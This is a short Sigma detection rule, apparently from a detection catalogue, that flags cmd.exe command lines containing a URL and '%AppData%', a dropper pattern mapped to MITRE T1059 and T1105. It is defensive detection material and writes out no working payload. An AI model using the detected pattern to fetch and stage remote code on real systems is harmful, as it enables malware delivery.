Techniques
Sample rules
Command Line Execution with Suspicious URL and AppData Strings
- source: sigma
- technicques:
- t1059
- t1059.001
- t1059.003
- t1105
Description
Detects a suspicious command line execution that includes an URL and AppData string in the command line parameters as used by several droppers (js/vbs > powershell)
Detection logic
condition: selection
selection:
CommandLine|contains|all:
- http
- ://
- '%AppData%'
Image|endswith: \cmd.exe